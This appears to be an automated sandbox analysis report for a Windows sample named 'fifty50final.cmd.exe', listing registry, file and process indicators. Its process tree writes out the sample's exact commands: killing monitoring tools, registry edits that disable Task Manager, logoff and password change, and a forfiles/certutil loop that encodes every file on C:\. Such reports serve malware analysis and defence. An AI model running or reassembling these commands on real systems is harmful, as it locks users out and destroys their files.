57ad72c7f7f87aeeff5eaf37d779a72d55a2876e3e95273311189b635b103c16

Analysis

max time kernel
151s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
09/01/2023, 11:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fifty50final.cmd.exe
Size

155KB
MD5

99e3c49edfa0934419a87adb9a1d99dd
SHA1

4c82fbdda744ce7ccf91e7f07b4ac2efffa68f19
SHA256

57ad72c7f7f87aeeff5eaf37d779a72d55a2876e3e95273311189b635b103c16
SHA512

2e4b876321e47c2ec98cfaf0989b0e023c3cac76b9e8e0812da975b2d75867041ade89ca7654d3354141c1c429f63d3f01cfe188f32c1013057908c5d3b689fa
SSDEEP

3072:XahKyd2n31i5GWp1icKAArDZz4N9GhbkrNEk1tT:XahOmp0yN90QEa

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	fifty50final.cmd.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	fifty50final.cmd.exe

Drops desktop.ini file(s) 14 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-999675638-2867687379-27515722-1000\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe
File opened for modification	C:\Program Files\desktop.ini	attrib.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\Desktop\Wallpaper	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\nn.txt	attrib.exe
File created	C:\Program Files\7-Zip\Lang\ne.txt.14849	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt.14849	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsita.xml	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\es.txt.14849	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrfralm.dat	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\imjplm.dll	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt.14849	attrib.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mshwLatin.dll.mui.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\micaut.dll.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\ShapeCollector.exe.mui	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\IpsMigrationPlugin.dll.mui	Process not Found
File opened for modification	C:\Program Files\AddSync.xlsm.14849	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	attrib.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\mip.exe.mui	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	attrib.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsen.xml	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\mshwLatin.dll	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\mraut.dll	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\Microsoft.Ink.dll	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt.14849	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml.14849	Process not Found
File opened for modification	C:\Program Files\7-Zip\7z.dll	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt.14849	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipscat.xml.14849	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwritash.dat.14849	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrcatlm.dat.14849	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt.14849	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\InkDiv.dll	Process not Found
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt.14849	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	attrib.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrcatlm.dat	Process not Found
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwresmlm.dat	Process not Found

Kills process with taskkill 64 IoCs

evasion

pid	Process
692	taskkill.exe
828	taskkill.exe
788	Process not Found
612	taskkill.exe
1756	Process not Found
1596	taskkill.exe
1836	Process not Found
1616	Process not Found
1596	Process not Found
964	Process not Found
764	Process not Found
1336	Process not Found
332	Process not Found
1148	taskkill.exe
1688	taskkill.exe
304	Process not Found
1168	Process not Found
680	Process not Found
1880	Process not Found
592	Process not Found
1816	taskkill.exe
1296	Process not Found
1944	Process not Found
1716	taskkill.exe
1248	Process not Found
1836	Process not Found
1932	Process not Found
1764	Process not Found
1068	taskkill.exe
1468	Process not Found
1732	Process not Found
912	taskkill.exe
592	taskkill.exe
1152	taskkill.exe
1456	taskkill.exe
1672	taskkill.exe
1848	Process not Found
660	Process not Found
744	Process not Found
1888	Process not Found
620	taskkill.exe
1628	taskkill.exe
1660	taskkill.exe
1364	taskkill.exe
1560	taskkill.exe
1848	Process not Found
1816	Process not Found
1512	taskkill.exe
1452	taskkill.exe
828	Process not Found
760	taskkill.exe
1880	Process not Found
1464	Process not Found
1884	taskkill.exe
1776	taskkill.exe
852	Process not Found
1516	taskkill.exe
1660	taskkill.exe
1584	Process not Found
744	Process not Found
1528	Process not Found
1428	taskkill.exe
852	Process not Found
1352	Process not Found

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1408	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	648	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeDebugPrivilege	1088	attrib.exe
Token: SeShutdownPrivilege	1468	shutdown.exe
Token: SeRemoteShutdownPrivilege	1468	shutdown.exe
Token: 33	1556	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1556	AUDIODG.EXE
Token: 33	1556	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1556	AUDIODG.EXE
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeShutdownPrivilege	1696	taskkill.exe
Token: SeRemoteShutdownPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeShutdownPrivilege	1908	cmd.exe
Token: SeRemoteShutdownPrivilege	1908	cmd.exe
Token: SeDebugPrivilege	820	cmd.exe
Token: SeShutdownPrivilege	1732	shutdown.exe
Token: SeRemoteShutdownPrivilege	1732	shutdown.exe
Token: SeDebugPrivilege	1252	certutil.exe
Token: SeShutdownPrivilege	1660	taskkill.exe
Token: SeRemoteShutdownPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeShutdownPrivilege	1512	shutdown.exe
Token: SeRemoteShutdownPrivilege	1512	shutdown.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeShutdownPrivilege	764	shutdown.exe
Token: SeRemoteShutdownPrivilege	764	shutdown.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeShutdownPrivilege	1644	attrib.exe
Token: SeRemoteShutdownPrivilege	1644	attrib.exe
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeShutdownPrivilege	612	cmd.exe
Token: SeRemoteShutdownPrivilege	612	cmd.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeShutdownPrivilege	1636	shutdown.exe
Token: SeRemoteShutdownPrivilege	1636	shutdown.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeShutdownPrivilege	1892	shutdown.exe
Token: SeRemoteShutdownPrivilege	1892	shutdown.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeShutdownPrivilege	1680	shutdown.exe
Token: SeRemoteShutdownPrivilege	1680	shutdown.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeShutdownPrivilege	1408	explorer.exe
Token: SeDebugPrivilege	868	taskkill.exe
Token: SeShutdownPrivilege	1964	shutdown.exe
Token: SeRemoteShutdownPrivilege	1964	shutdown.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeShutdownPrivilege	944	shutdown.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

pid	Process
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe
1408	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 368 wrote to memory of 1556	368	fifty50final.cmd.exe	26
PID 368 wrote to memory of 1556	368	fifty50final.cmd.exe	26
PID 368 wrote to memory of 1556	368	fifty50final.cmd.exe	26
PID 368 wrote to memory of 1556	368	fifty50final.cmd.exe	26
PID 368 wrote to memory of 1556	368	fifty50final.cmd.exe	26
PID 1556 wrote to memory of 1336	1556	cmd.exe	28
PID 1556 wrote to memory of 1336	1556	cmd.exe	28
PID 1556 wrote to memory of 1336	1556	cmd.exe	28
PID 368 wrote to memory of 984	368	fifty50final.cmd.exe	29
PID 368 wrote to memory of 984	368	fifty50final.cmd.exe	29
PID 368 wrote to memory of 984	368	fifty50final.cmd.exe	29
PID 984 wrote to memory of 1088	984	cmd.exe	31
PID 984 wrote to memory of 1088	984	cmd.exe	31
PID 984 wrote to memory of 1088	984	cmd.exe	31
PID 984 wrote to memory of 1640	984	cmd.exe	33
PID 984 wrote to memory of 1640	984	cmd.exe	33
PID 984 wrote to memory of 1640	984	cmd.exe	33
PID 984 wrote to memory of 1716	984	cmd.exe	34
PID 984 wrote to memory of 1716	984	cmd.exe	34
PID 984 wrote to memory of 1716	984	cmd.exe	34
PID 984 wrote to memory of 820	984	cmd.exe	35
PID 984 wrote to memory of 820	984	cmd.exe	35
PID 984 wrote to memory of 820	984	cmd.exe	35
PID 984 wrote to memory of 1456	984	cmd.exe	36
PID 984 wrote to memory of 1456	984	cmd.exe	36
PID 984 wrote to memory of 1456	984	cmd.exe	36
PID 984 wrote to memory of 648	984	cmd.exe	37
PID 984 wrote to memory of 648	984	cmd.exe	37
PID 984 wrote to memory of 648	984	cmd.exe	37
PID 984 wrote to memory of 556	984	cmd.exe	38
PID 984 wrote to memory of 556	984	cmd.exe	38
PID 984 wrote to memory of 556	984	cmd.exe	38
PID 984 wrote to memory of 1840	984	cmd.exe	39
PID 984 wrote to memory of 1840	984	cmd.exe	39
PID 984 wrote to memory of 1840	984	cmd.exe	39
PID 984 wrote to memory of 1664	984	cmd.exe	40
PID 984 wrote to memory of 1664	984	cmd.exe	40
PID 984 wrote to memory of 1664	984	cmd.exe	40
PID 984 wrote to memory of 1992	984	cmd.exe	41
PID 984 wrote to memory of 1992	984	cmd.exe	41
PID 984 wrote to memory of 1992	984	cmd.exe	41
PID 984 wrote to memory of 1988	984	cmd.exe	42
PID 984 wrote to memory of 1988	984	cmd.exe	42
PID 984 wrote to memory of 1988	984	cmd.exe	42
PID 984 wrote to memory of 1928	984	cmd.exe	43
PID 984 wrote to memory of 1928	984	cmd.exe	43
PID 984 wrote to memory of 1928	984	cmd.exe	43
PID 984 wrote to memory of 1364	984	cmd.exe	44
PID 984 wrote to memory of 1364	984	cmd.exe	44
PID 984 wrote to memory of 1364	984	cmd.exe	44
PID 984 wrote to memory of 660	984	cmd.exe	45
PID 984 wrote to memory of 660	984	cmd.exe	45
PID 984 wrote to memory of 660	984	cmd.exe	45
PID 984 wrote to memory of 1480	984	cmd.exe	46
PID 984 wrote to memory of 1480	984	cmd.exe	46
PID 984 wrote to memory of 1480	984	cmd.exe	46
PID 984 wrote to memory of 1408	984	cmd.exe	47
PID 984 wrote to memory of 1408	984	cmd.exe	47
PID 984 wrote to memory of 1408	984	cmd.exe	47
PID 984 wrote to memory of 1116	984	cmd.exe	48
PID 984 wrote to memory of 1116	984	cmd.exe	48
PID 984 wrote to memory of 1116	984	cmd.exe	48
PID 1116 wrote to memory of 1772	1116	forfiles.exe	49
PID 1116 wrote to memory of 1772	1116	forfiles.exe	49

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
436	Process not Found
940	Process not Found
1756	Process not Found
1572	Process not Found
1812	Process not Found
852	attrib.exe
1672	attrib.exe
1736	Process not Found
1664	Process not Found
1928	Process not Found
1252	Process not Found
828	Process not Found
1560	Process not Found
820	attrib.exe
900	attrib.exe
912	Process not Found
1884	Process not Found
1628	attrib.exe
1192	Process not Found
1648	attrib.exe
1848	Process not Found
868	Process not Found
1816	attrib.exe
1468	attrib.exe
1752	Process not Found
1616	Process not Found
1464	attrib.exe
1944	attrib.exe
1148	Process not Found
1792	attrib.exe
944	Process not Found
1664	Process not Found
816	Process not Found
680	Process not Found
1148	Process not Found
1880	attrib.exe
1564	attrib.exe
1452	Process not Found
1088	Process not Found
1316	Process not Found
1204	attrib.exe
1336	attrib.exe
1900	Process not Found
1920	Process not Found
1880	attrib.exe
1832	attrib.exe
1528	Process not Found
1560	Process not Found
1888	Process not Found
692	attrib.exe
1700	attrib.exe
1296	attrib.exe
1576	Process not Found
744	Process not Found
1168	Process not Found
1688	attrib.exe
852	Process not Found
1596	Process not Found
1440	attrib.exe
1204	attrib.exe
1596	attrib.exe
1296	Process not Found
1624	Process not Found
592	Process not Found

C:\Users\Admin\AppData\Local\Temp\fifty50final.cmd.exe
"C:\Users\Admin\AppData\Local\Temp\fifty50final.cmd.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:368
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\setup.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\system32\cscript.exe
    cscript //nologo C:\Users\Admin\AppData\Local\Temp\msg.vbs
    3⤵
    PID:1336
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fifty50.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im procexp.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im procexp64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im procmon.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im procmon64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im taskmgr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:648
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:1664
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:1992
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1364
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:660
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:1480
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    3⤵
    - Modifies Installed Components in the registry
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1408
- - C:\Windows\system32\forfiles.exe
    forfiles /S /P C:\$Recycle.Bin /C "cmd /c if @isdir==FALSE attrib -s -h -r *.* & certutil -encode -f @file @file.20850 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1116
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "S-1-5-21-999675638-2867687379-27515722-1000" "S-1-5-21-999675638-2867687379-27515722-1000".20850 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1772
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini" "desktop.ini".20850 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:672
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        Drops desktop.ini file(s)
        
        PID:900
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "desktop.ini" "desktop.ini".20850
        5⤵
        
        PID:1848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        
        PID:1088
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
- - C:\Windows\system32\forfiles.exe
    forfiles /S /P C:\ /C "cmd /c if @isdir==FALSE attrib -s -h -r *.* & certutil -encode -f @file @file.14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a"
    3⤵
    PID:1376
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "$Recycle.Bin" "$Recycle.Bin".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1700
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Documents and Settings" "Documents and Settings".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1440
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "MSOCache" "MSOCache".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1428
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pagefile.sys" "pagefile.sys".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1560
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1680
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "pagefile.sys" "pagefile.sys".14849
        5⤵
        
        PID:1880
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1888
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /a
        5⤵
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "PerfLogs" "PerfLogs".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1928
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Program Files" "Program Files".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1364
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Program Files (x86)" "Program Files (x86)".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:660
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProgramData" "ProgramData".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:324
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Recovery" "Recovery".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1268
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "System Volume Information" "System Volume Information".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:576
  - - C:\Windows\system32\cmd.exe
      /c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Users" "Users".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:1764
  - - C:\Windows\system32\cmd.exe
      /c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x64.log-MSI_vc_red.msi.txt" "vcredist2010_x64.log-MSI_vc_red.msi.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a
      4⤵
      PID:900
    - - C:\Windows\system32\attrib.exe
        
        attrib -s -h -r *.*
        5⤵
        
        PID:1920
    - - C:\Windows\system32\certutil.exe
        
        certutil -encode -f "vcredist2010_x64.log-MSI_vc_red.msi.txt" "vcredist2010_x64.log-MSI_vc_red.msi.txt".14849
        5⤵
        
        PID:1596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:852
